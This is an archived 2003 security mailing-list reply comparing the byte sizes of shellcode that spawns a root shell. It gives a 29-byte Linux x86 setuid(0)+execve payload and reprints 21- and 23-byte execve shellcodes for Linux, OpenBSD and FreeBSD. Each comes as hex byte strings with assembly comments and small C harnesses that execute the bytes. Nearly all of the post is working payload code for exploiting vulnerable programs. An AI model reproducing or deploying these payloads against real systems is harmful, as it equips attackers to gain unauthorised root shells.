Dailydave mailing list archives
Re: Shellcode Size
From: Max Vision <vision () whitehats com>
Date: Mon, 24 Nov 2003 13:48:48 -0800 (PST)
On Sun, 23 Nov 2003, David Maynor wrote:
What is the smallest shellcode anybidy has written to spawn a simple shell with uid 0. I am down to 31 bytes and I was wondering if anybody has smaller.
I would swear someone sent me obscenely small "private" shellcode one of the many previous times this question has come up (years ago), but I can't find it. Anyhow, how about these 29bytes, untested: "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\x31\xc9\xf7\xe1\x04\x0b\x52\x68" "\x2f\x61\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\xcd\x80"; That's assuming you're talking linux x86. I just took zasta's 21byte shellcode and prepended setuid(0). I think it takes 10 bytes to do setreuid(0,0) corrent me if I'm wrong. ("\x31\xc0\x89\xc3\x89\xc1\xb0\x47\xcd\x80" /* setregid(0, 0) */) Here is zasta's code, null argv so uses ash... /* 21 byte execve("/bin/ash",0,0); shellcode for linux x86 * by zasta (zasta () darkircop org) */ #include <unistd.h> #include <stdio.h> char shellcode[] = "\x31\xc9\xf7\xe1\x04\x0b\x52\x68" "\x2f\x61\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\xcd\x80"; void code() { __asm__(" xor %ecx,%ecx mul %ecx addb $0xb,%al push %edx push $0x6873612f push $0x6e69622f mov %esp,%ebx int $0x80 "); } void (*ptr)() = (void(*)()) &shellcode[0];(*ptr)(); the next smallest shellcodes i have seen are 23 bytes each (linux/freebsd/openbsd): /************************************************************ * Linux 23 byte execve code. Greetz to preedator * * marcetam * * admin () marcetam net * *************************************************************/ char linux[]= "\x99" /* cdq */ "\x52" /* push %edx */ "\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */ "\x89\xe3" /* mov %esp,%ebx */ "\x52" /* push %edx */ "\x54" /* push %esp */ "\x54" /* push %esp */ "\x59\x6a" /* pop %ecx */ "\x0b\x58" /* push $0x0b */ "\xcd\x80"; /* int $0x80 */ int main(){ void (*run)()=(void *)linux; printf("%d bytes \n",strlen(linux)); run(); } /************************************************************ * OpenBSD 23 byte execve code. Greetz to preedator * * marcetam * * admin () marcetam net * *************************************************************/ char open_bsd[]= "\x99" /* cdq */ "\x52" /* push %edx */ "\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */ "\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */ "\x89\xe3" /* mov %esp,%ebx */ "\x52" /* push %edx */ "\x54" /* push %esp */ "\x53" /* push %ebx */ "\x53" /* push %ebx */ "\x6a\x3b" /* push $0x3b */ "\x58" /* pop %eax */ "\xcd\x80"; /* int $0x80 */ int main(){ void (*run)()=(void *)open_bsd; printf("%d bytes\n",strlen(open_bsd)); run(); } /* FreeBSD 23 byte execve code. Greetz to anathema, the first who published * * this way of writing shellcodes. * * greetz to preedator marcetam * * admin () marcetam net * ****************************************************************************/ char fbsd_execve[]= "\x99" /* cdq */ "\x52" /* push %edx */ "\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */ "\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */ "\x89\xe3" /* movl %esp,%ebx */ "\x51" /* push %ecx - or %edx :) */ "\x52" /* push %edx - or %ecx :) */ "\x53" /* push %ebx */ "\x53" /* push %ebx */ "\x6a\x3b" /* push $0x3b */ "\x58" /* pop %eax */ "\xcd\x80"; /* int $0x80 */ int main() { void (*run)()=(void *)fbsd_execve; printf("%d bytes \n",strlen(fbsd_execve)); } Max _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://www.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- Shellcode Size David Maynor (Nov 24)
- Re: Shellcode Size Max Vision (Nov 24)